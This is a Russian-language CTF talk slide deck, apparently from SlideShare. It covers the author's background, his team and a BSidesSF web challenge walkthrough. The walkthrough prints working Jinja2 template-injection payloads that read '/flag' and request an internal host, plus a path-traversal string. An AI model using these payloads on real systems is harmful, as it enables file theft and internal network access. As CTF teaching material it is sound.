Playing CTF and Entering the World of Information Security / Играем в CTF познаем мир информационной безопасности
0 likes541 views
Документ описывает личный опыт участника CTF (Capture the Flag) в области информационной безопасности, а также его достижения и участие в различных лабораториях и соревнованиях. Участник делится своими навыками программирования и заинтересованностью в CTF, а также предоставляет информацию о команде Hackerstan. В документе также упоминаются различные виды CTF и конкретные технические примеры, включая уязвимости и методы эксплуатации.
![{{''.__class__.__mro__[2].__subclasses__()}}](https://image.slidesharecdn.com/ctf-170419134424/85/Playing-CTF-and-Entering-the-World-of-Information-Security-CTF-29-320.jpg)
![{{''.__class__.__mro__[2].__subclasses__().
__str__().split(‘, ’)[40]}}](https://image.slidesharecdn.com/ctf-170419134424/85/Playing-CTF-and-Entering-the-World-of-Information-Security-CTF-30-320.jpg)
![{{''.__class__.__mro__[2].__subclasses__()[40]('/flag').read()}}](https://image.slidesharecdn.com/ctf-170419134424/85/Playing-CTF-and-Entering-the-World-of-Information-Security-CTF-31-320.jpg)
![{{''.__class__.__mro__[2].__subclasses__().
__str__().split(‘, ’)[341]}}](https://image.slidesharecdn.com/ctf-170419134424/85/Playing-CTF-and-Entering-the-World-of-Information-Security-CTF-32-320.jpg)
![{% with b=''.__class__.__mro__[2].
__subclasses__()[341]('vault:8080') %}
{{b.request('GET', '/flag')}}
{{b.getresponse().read()}}{% endwith %}](https://image.slidesharecdn.com/ctf-170419134424/85/Playing-CTF-and-Entering-the-World-of-Information-Security-CTF-33-320.jpg)
Playing CTF and Entering the World of Information Security / Играем в CTF познаем мир информационной безопасности
- 1. Играем в CTF - познаем мир информационной безопасности
- 2. Кто я такой? • Участник CTF команды b1n4ry4rms и один из основателей команды hackerstan (об этой команде ниже) • Играю в CTF c августа 2016 года • Работаю в Mad Devs, занимаюсь вебом. • Больше 10 лет опыта в программировании • Интересуюсь ИБ
- 3. В каких CTF поучаствовал?
- 4. Лаборатории, в которых участвовал: V8 , V9, V10 lab.pentestit.r u
- 5. Что такое CTF? • Скорость • Навыки и знания • Командная работа
- 8. Ну и главная цель CTF :)
- 9. Результаты личного CTF hackyou.ctf.su • 1400 очков 62 место из 374 участников и я единственный из Кыргызстана :) участвовал
- 10. Достижения hackerstan 540 pts 406 место
- 11. hackerstan А ты готов вступить в ряды нашей команды? https://goo.gl/SvZvqG
- 13. Виды CTF • Jeopardy • Командные • Личные • Attack-defence • Командные
- 14. Погрузимся в мир CTF
- 15. Zumbo 3 (WEB) Bsidessf CTF
- 19. <!-- page: index.template, src: /code/server.py -->
- 21. flag1 = 'FLAG: FIRST_FLAG_WASNT_HARD'
- 22. with open('/flag') as f: flag2 = f.read()
- 25. /..%2f../flag
- 26. template += "n<!-- page: %s, src: %s -->n" % (page, __file__) return flask.render_template_string( template, name='test', counter=counter);
- 27. SSTI - Server Side Template Injection ? Как проверить?
- 33. {% with b=''.__class__.__mro__[2]. __subclasses__()[341]('vault:8080') %} {{b.request('GET', '/flag')}} {{b.getresponse().read()}}{% endwith %}
- 34. hackyou.ctf.su
- 36. root@kali:~/# echo -e "ZDc3MTEyMDJmYmFiOGE2ZTc1YjY5ZmZmOGZiOWQ3OTM=" | base64 -d; echo '' d7711202fbab8a6e75b69fff8fb9d793 root@kali:~/#
- 37. root@windows:~/ScrapyProjects# scrapy startproject hackyouctf New Scrapy project 'hackyouctf', using template directory '/usr/local/lib/python2.7/dist-packages/scrapy/templates/project', created in: /root/ScrapyProjects/hackyouctf You can start your first spider with: cd hackyouctf scrapy genspider example example.com
- 38. root@windows:~/ScrapyProjects/hackyouctf# scrapy genspider ppc100 hackyou-captcha.ctf.su Created spider 'ppc100' using template 'basic' in module: Hackyouctf.spiders.ppc100 root@windows:~/ScrapyProjects/hackyouctf# cd hackyouctf/spiders/ root@windows:~/ScrapyProjects/hackyouctf/hackyouctf/spiders# ls __init__.py __init__.pyc ppc100.py root@windows:~/ScrapyProjects/hackyouctf/hackyouctf/spiders#
- 40. Scrapy Spider
- 41. root@windows:~/ScrapyProjects/hackyouctf# scrapy crawl ppc100 Flag: <b>Kill_4ll_hum4ns_like_in_f1rst_hack_y0u_h2LExNo</b>
- 48. Вс3м сп4с160!